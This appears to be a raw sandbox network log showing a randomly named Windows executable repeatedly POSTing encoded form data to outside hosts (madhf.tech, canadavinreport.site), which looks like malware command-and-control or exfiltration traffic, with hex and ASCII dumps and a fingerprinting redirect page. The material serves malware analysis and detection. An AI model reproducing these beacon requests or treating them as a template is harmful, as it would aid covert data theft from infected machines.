                                                                              Location: http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTB
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.849714103.224.182.242803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:37.712532997 CET625OUTPOST /0mwe/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.madhf.tech
                                                                              Origin: http://www.madhf.tech
                                                                              Referer: http://www.madhf.tech/0mwe/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 56 4d 4b 71 73 68 6e 59 56 43 43 79 58 72 50 52 78 47 72 48 41 78 55 52 48 6e 39 5a 38 65 4f 6a 51 6b 59 6a 6f 73 3d
                                                                              Data Ascii: DzLTc=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2UVMKqshnYVCCyXrPRxGrHAxURHn9Z8eOjQkYjos=
                                                                              Jan 11, 2025 09:27:38.335285902 CET871INHTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:38 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584058.5003721; expires=Tue, 09-Jan-2035 08:27:38 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                                              Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.849715103.224.182.242803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:40.260031939 CET645OUTPOST /0mwe/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.madhf.tech
                                                                              Origin: http://www.madhf.tech
                                                                              Referer: http://www.madhf.tech/0mwe/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 5a 2f 52 45 50 4c 63 4c 44 6d 35 7a 30 6f 39 2f 37 4e 49 4a 66 4a 34 4f 54 47 38 4b 7a 49 42 69 67 32 30 59 6c 4e
                                                                              Data Ascii: DzLTc=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEAZ/REPLcLDm5z0o9/7NIJfJ4OTG8KzIBig20YlN
                                                                              Jan 11, 2025 09:27:40.844782114 CET871INHTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:40 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584060.1234156; expires=Tue, 09-Jan-2035 08:27:40 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                                              Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.849716103.224.182.242803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:42.808207035 CET1662OUTPOST /0mwe/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.madhf.tech
                                                                              Origin: http://www.madhf.tech
                                                                              Referer: http://www.madhf.tech/0mwe/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 79 6d 31 32 76 35 61 44 65 48 66 44 35 71 49 55 4f 76 63 38 33 4a 79 6a 6b 5a 31 66 58 4d 46 2f 54 47 79 38 75 49 38 38 44 41 64 30 77 2b 38 50 67 33 59 42 69 71 62 77 45 72 30 39 32 31 4e 67 74 75 4a 56 47 59 69 66 56 33 57 69 56 55 35 4e 54 78 52 34 4d 45 38 6a 66 45 59 4e 54 39 74 2b 4f 36 41 2b 6b 5a 61 2f 57 48 54 62 69 4e 4d 67 45 4b 78 51 4d 48 57 65 63 43 70 52 51 55 72 55 34 36 51 41 47 57 75 4c 30 77 61 2b 6c 50 61 57 6e 68 6b 79 54 6b 4b 4e 37 4f 51 50 64 6a 41 77 69 65 [TRUNCATED]
                                                                              Data Ascii: DzLTc=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QEym12v5aDeHfD5qIUOvc83JyjkZ1fXMF/TGy8uI88DAd0w+8Pg3YBiqbwEr0921NgtuJVGYifV3WiVU5NTxR4ME8jfEYNT9t+O6A+kZa/WHTbiNMgEKxQMHWecCpRQUrU46QAGWuL0wa+lPaWnhkyTkKN7OQPdjAwieFHkd5Ge16QeoyP6i/p0T08QcXOpHlEDICQvJ70yIoMp/0wFvGmMhiruaRdSFy5qVpmNxeM3u4+JOvHZ4juzC7zPOrp173Yu19Gtyz1lycKhnkctJjtURxKTLVSn1OtKs4UAePRIv7FA28CVtaAB1icCzT6TTdwGs+dbLy9AldXFPlUpqXM/Kio8kKtgkFZGscJe+3BY3EZbYAs9SUGnD8FRPq4kY0m54r4UD5jDrB3emy4N6c/CMp4yC+6kAHQz/DZjXhSRhpGu0WLqZqi8vPWTQs05KewGgtuzO9j3su8Az4P2x6+xI+szdByE5LSPaQXSk03mno5EgoNrLDn23CN+BqPEzCjElMZ7QRKXaeqXtAbLRLBcQuHX1LkATxrEgWaeOOhcVinVH2CkHkoOLTFy11+XkSap3vfbBngDkJ2Kl/LcypV8s6TCtFX73XOfjclWOy86KvRmuNlaWYPm8G+Zhhzc44/NdcZWR+s4PyCVWaBVBsmcaStBxXEuppD/U4BcbVgm7X/YTGwLQDgK5vdsGqi/7cekukD8JQcpyVkV0oMKxn7rj8dhEeQFQg3UoQpvjtjYjfhFdYJdO1rWAxEdng+UAkgdYAGpEXQ08OVSPnya+wl4BQaLlEOWgyJ9NayqKOaR6bRb+wxNlNjJV+o5Q+g33+605SE [TRUNCATED]
                                                                              Jan 11, 2025 09:27:43.412242889 CET871INHTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:43 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584063.7482204; expires=Tue, 09-Jan-2035 08:27:43 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                                              Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.849717103.224.182.242803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:45.348301888 CET374OUTGET /0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.madhf.tech
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:27:45.957041025 CET1236INHTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:45 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584065.5728803; expires=Tue, 09-Jan-2035 08:27:45 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-length: 1523
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 44 7a 4c 54 63 3d 49 36 2f 4d 76 6f 73 49 31 4d 34 47 58 6e 41 43 37 62 53 59 47 46 71 72 78 59 64 67 4a 54 4e 65 39 74 6d 6b 45 73 7a 7a 52 74 4f 57 49 77 52 63 49 76 58 73 30 35 48 61 33 6a 58 59 6f 51 70 78 64 59 35 68 42 30 46 57 51 4d 31 56 7a 56 46 73 4a 62 56 4e 34 35 4a 44 65 62 37 6a 69 34 57 76 53 4d 53 6c 34 70 35 56 6a 42 39 6a 37 75 78 4b 42 55 68 54 6f 4b 46 37 47 44 70 2f 30 41 61 57 65 67 3d 3d 26 6d 38 3d [TRUNCATED]
                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTB&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolo
                                                                              Jan 11, 2025 09:27:45.957063913 CET559INData Raw: 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e
                                                                              Data Ascii: r="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.849737185.27.134.206803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:51.025809050 CET655OUTPOST /g3h7/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.canadavinreport.site
                                                                              Origin: http://www.canadavinreport.site
                                                                              Referer: http://www.canadavinreport.site/g3h7/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 42 75 2f 56 67 47 6c 74 61 43 64 6f 59 2b 6b 55 6b 4a 64 56 59 54 37 74 34 7a 55 4d 7a 6e 76 4b 59 49 46 4a 58 51 3d
                                                                              Data Ascii: DzLTc=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSiBu/VgGltaCdoY+kUkJdVYT7t4zUMznvKYIFJXQ=
                                                                              Jan 11, 2025 09:27:51.616153002 CET682INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:51 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Content-Encoding: br
                                                                              Data Raw: 31 62 38 0d 0a a1 38 1a 00 20 d3 9c 39 ad 1c 69 72 62 45 10 f4 31 ad 4f f9 2d 95 fa bd 66 e0 9c a8 13 9d 6a 64 83 6f 96 9c 38 e0 09 97 47 dd e8 27 bc ea 1c 9e fe 73 13 e8 da 85 c4 20 c8 29 09 4c 73 d2 43 ad c6 00 3f a9 38 9e 61 32 51 6e 11 f7 17 10 34 ad e4 c6 42 f9 a6 2f 65 39 c1 c8 59 04 16 e0 94 93 9f df b5 cd 43 26 09 e2 18 25 1d 1c 04 b9 32 2e 1d 38 2c 69 8b 33 86 d0 3f c4 7d f7 df 45 e2 c9 6d 03 74 80 6b c5 ca cf 6f 6c 65 26 e5 ac d1 b2 ae 9f 9f 5b 21 f6 97 fe 9e fe c3 64 2e e5 f5 7c ae 76 97 3e 7c 65 98 c7 4e 42 88 bd 4c 6b df b2 ef db 5e fb 30 44 2e 94 41 c6 1a fb e9 bf 2f 61 0a 2b 08 51 78 71 b1 80 06 41 c6 86 5d ce 86 84 fe c7 db 53 12 a0 ff 80 9e 51 aa 95 b0 a9 50 59 96 db 42 30 6e 18 a1 a5 b0 9a 8a 54 17 10 61 1d f3 5a 70 52 14 26 77 ce 71 66 88 10 05 17 29 15 39 e5 54 17 c2 f3 b4 81 cc 63 e2 29 25 cc 15 2c 37 a9 27 54 f0 92 b3 5c fb 8c 88 5c 11 2b 78 8b 6b 3b 31 d3 46 57 00 53 12 fe fe 2e dd 62 29 61 88 34 24 b0 f3 d7 f7 1f b1 75 66 be 9b 2e 03 83 73 ac b0 46 28 84 35 60 e6 87 b2 dd 5d [TRUNCATED]
                                                                              Data Ascii: 1b88 9irbE1O-fjdo8G's )LsC?8a2Qn4B/e9YC&%2.8,i3?}Emtkole&[!d.|v>|eNBLk^0D.A/a+QxqA]SQPYB0nTaZpR&wqf)9Tc)%,7'T\\+xk;1FWS.b)a4$uf.sF(5`]a@ ']59q;ToeOf^IT0WFHe T2-4J+0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.849756185.27.134.206803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:53.572449923 CET675OUTPOST /g3h7/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.canadavinreport.site
                                                                              Origin: http://www.canadavinreport.site
                                                                              Referer: http://www.canadavinreport.site/g3h7/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 37 51 74 37 62 69 4a 45 36 48 51 37 59 31 58 41 48 48 78 55 36 31 4c 75 42 6b 76 4b 65 6c 42 49 53 42 6f 32 56 4a
                                                                              Data Ascii: DzLTc=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWY7Qt7biJE6HQ7Y1XAHHxU61LuBkvKelBISBo2VJ
                                                                              Jan 11, 2025 09:27:54.173511028 CET682INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:54 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Content-Encoding: br
